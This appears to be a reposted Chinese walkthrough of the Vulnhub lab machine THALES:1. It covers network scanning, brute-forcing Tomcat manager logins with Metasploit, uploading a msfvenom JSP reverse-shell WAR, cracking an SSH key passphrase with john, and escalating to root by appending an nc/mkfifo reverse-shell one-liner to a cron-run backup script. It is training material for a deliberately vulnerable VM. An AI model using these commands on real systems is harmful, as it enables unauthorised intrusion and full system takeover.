当前位置:网站首页>【Vulnhub靶场】THALES:1
【Vulnhub靶场】THALES:1
2022-07-07 14:12:00 【Nailaoyyds】
目录
前言
描述
简介:睁开眼,换个角度
包括 2 个标志:user.txt 和 root.txt。
下载链接
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00环境介绍 kali 192.168.56.102 Thales靶机 192.168.56.101
一、信息收集
0x00 arp-scan扫描
arp-scan -I eth1 -l #扫描网卡局域网
0x01 nmap扫描
扫描到两个网段 不确定是哪个 nmap 扫描扫描两个IP
开放端口22和8080
访问站点,发现需要用户名密码
二、漏洞利用
0x00 msfconsole利用
msf搜索tomcat login
配置payload
用户名 tomcat 密码 role1
成功登入
0x01 文件上传
寻找功能点,发现上传点
利用kali生成war文件木马做反弹shell msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
上传成功,并运行
三、权限提升
0x00 反弹shell
监听端口
升级成交互式shell
sudo -l #需要密码,未知 在home文件下发现用户Thales
在`notes.txt`文件中发现`/usr/local/bin/backup.sh 查看文件内容
0x02 字典爆破
发现.ssh文件夹
发现私钥可以用ssh2john.py生成密码文件爆破
用 ssh2john.py
脚本编译一下
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
爆破出密码vodka06
切换用户
0x03 user.txt
查看user.txt---第一个flag
notes.txt是root权限的,里边可能是有东西都
0x04 反弹shell
看到backup.sh是有执行权限的,可以写入反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
文件内容编辑会直接替换,选择用追加
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
监听9999,写入以后过一会就自己连接了
总结
Thales学到了
msf的爆破字典的使用
rsa私钥密文的利用
边栏推荐
- 航天宏图信息中标乌鲁木齐某单位数据库系统研发项目
- Shandong old age Expo, 2022 China smart elderly care exhibition, smart elderly care and aging technology exhibition
- 分步式監控平臺zabbix
- 讲师征集令 | Apache SeaTunnel(Incubating) Meetup 分享嘉宾火热招募中!
- Three. Introduction to JS learning notes 17: mouse control of 3D model rotation of JSON file
- thinkphp3.2.3中设置路由,优化url
- Balanced binary tree (AVL)
- three.js打造酷炫下雪效果
- Laravel5.1 路由 -路由分组
- How does geojson data merge the boundaries of regions?
猜你喜欢
Performance comparison of tidb for PostgreSQL and yugabytedb on sysbench
记一次项目的迁移过程
Step by step monitoring platform ZABBIX
Logback日志框架第三方jar包 免费获取
企业级日志分析系统ELK
Three. JS introductory learning notes 18: how to export JSON files with Blender
Odoo integrated plausible embedded code monitoring platform
喜讯!科蓝SUNDB数据库与鸿数科技隐私数据保护管理软件完成兼容性适配
The unity vector rotates at a point
星瑞格数据库入围“2021年度福建省信息技术应用创新典型解决方案”
随机推荐
Is it reliable to open an account on Tongda letter with your mobile phone? Is there any potential safety hazard in such stock speculation
Leetcode-231-2的幂
Asyncio concept and usage
Good news! Kelan sundb database and Hongshu technology privacy data protection management software complete compatibility adaptation
Laravel 服务提供者实例教程 —— 创建 Service Provider 测试实例
47_Opencv中的轮廓查找 cv::findContours()
php 自带过滤和转义函数
laravel怎么获取到public路径
torch.numel作用
Eye of depth (VI) -- inverse of matrix (attachment: some ideas of logistic model)
分步式监控平台zabbix
How to determine whether the checkbox in JS is selected
47_ Contour lookup in opencv cv:: findcontours()
leetcode 241. Different ways to add parentheses design priority for operational expressions (medium)
three.js打造酷炫下雪效果
Eye of depth (VII) -- Elementary Transformation of matrix (attachment: explanation of some mathematical models)
Lecturer solicitation order | Apache seatunnel (cultivating) meetup sharing guests are in hot Recruitment!
PHP实现微信小程序人脸识别刷脸登录功能
Unity3d click events added to 3D objects in the scene
Power of leetcode-231-2